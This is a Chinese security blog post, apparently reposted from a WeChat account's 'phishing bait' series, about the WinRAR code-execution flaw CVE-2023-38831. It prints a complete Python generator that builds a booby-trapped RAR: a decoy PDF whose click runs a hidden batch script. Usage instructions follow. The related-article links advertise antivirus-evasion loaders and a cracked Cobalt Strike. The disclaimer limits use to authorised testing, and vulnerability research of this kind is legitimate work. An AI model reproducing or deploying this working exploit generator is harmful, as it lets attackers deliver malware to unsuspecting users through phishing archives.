【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

admin 2023年10月27日01:56:34评论18 views字数 2131阅读7分6秒阅读模式

声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!


      现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!


【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)



【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

0x00 前言

WinRAR是一款文件压缩器,该产品支持RAR、ZIP等格式文件的压缩和解压等。WinRAR 在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码。

本漏洞不适合实战使用,脱离了常规逻辑的用户点击使用习惯,且文案很难搭配。因此只建议本地复现熟悉一下,以防面试中问起来不知道。

【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)



【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

0x01 影响版本

WinRAR< 6.23

【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)



【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

0x02 复现过程 

恶意winrar制作代码如下

import shutilimport os, sysfrom os.path import joinTEMPLATE_NAME = "TEMPLATE"OUTPUT_NAME = "CVE-2023-38831-poc.rar"
BAIT_NAME = "CLASSIFIED_DOCUMENTS.pdf"SCRIPT_NAME = "script.bat"
if len(sys.argv) > 3: BAIT_NAME = os.path.basename(sys.argv[1]) SCRIPT_NAME = os.path.basename(sys.argv[2]) OUTPUT_NAME = os.path.basename(sys.argv[3])elif len(sys.argv) == 2 and sys.argv[1] == "poc": passelse: print("""Usage: python .cve-2023-38831-exp-gen.py poc python .cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""") sys.exit()
BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")
print("BAIT_NAME:", BAIT_NAME)print("SCRIPT_NAME:", SCRIPT_NAME)print("OUTPUT_NAME:", OUTPUT_NAME)
if os.path.exists(TEMPLATE_NAME): shutil.rmtree(TEMPLATE_NAME)os.mkdir(TEMPLATE_NAME)d = join(TEMPLATE_NAME, BAIT_NAME + "A")if not os.path.exists(d): os.mkdir(d)
shutil.copyfile(join(SCRIPT_NAME), join(d, BAIT_NAME+"A.cmd"))shutil.copyfile(join(BAIT_NAME), join(TEMPLATE_NAME, BAIT_NAME+"B"))
shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)
with open(TEMPLATE_NAME + ".zip", "rb") as f: content = f.read() content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ") content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")
os.remove(TEMPLATE_NAME + ".zip")
with open(OUTPUT_NAME, "wb") as f: f.write(content)
print("ok..")

首先我们需要准备3个文件,exp.py为上面的恶意winrar生成代码,calc.bat为恶意bat文件,filename.pdf为必须附带的文件。

【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

最后面的参数"cve-2023-38831.rar"为最后恶意文件生成的名称,前两个则为pdf名称与恶意bat的名称。当执行生成完后,会在当前目录生成一个cve-2023-38831.rar的文件。

【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

想要触发这个漏洞,必须双击进入winrar解压界面中。并且点击下面的filename.pdf才可以触发,点击后就会执行之前calc.bat中的恶意代码。

【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

那个,你都看到这里了,还不点个关注吗~~

【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)



【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

关于我们

持续从基础到深入的更新攻防文章

点击下方名片进入公众号,欢迎关注!

【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)



【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

往期回顾

钓鱼系列文章

【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)
【免杀技术】SingleSC 10.25 红队免杀加载器免杀之玩坏ChatGPT——铁树开花-基础本地加载
SlientSC 10.17 红队免杀加载器分享
【猫蛋儿钓鱼】鱼饵-winrar捆绑手法
【工具分享】CS4.9 破解版已出!!!
【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

点个小赞你最好看


原文始发于微信公众号(猫蛋儿安全):【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月27日01:56:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【猫蛋儿钓鱼】鱼饵-WinRAR远程代码执行(CVE-2023-38831)http://cn-sec.com/archives/2149220.html

发表评论

匿名网友 填写信息